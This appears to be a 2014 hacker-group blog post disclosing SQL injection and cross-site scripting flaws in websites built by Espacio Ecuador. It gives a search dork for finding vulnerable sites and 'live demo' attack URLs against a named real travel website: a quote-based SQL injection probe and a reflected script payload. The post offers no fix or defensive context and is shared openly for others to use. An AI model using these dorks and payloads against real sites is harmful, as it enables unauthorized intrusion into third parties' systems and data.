Friday, 4 July 2014

Espacio Ecuador XSS & SQLI

Dork:
intext:"developed by Espacio Ecuador"

Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>

Live Demo:

SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


NEXUS - Sharing Is Caring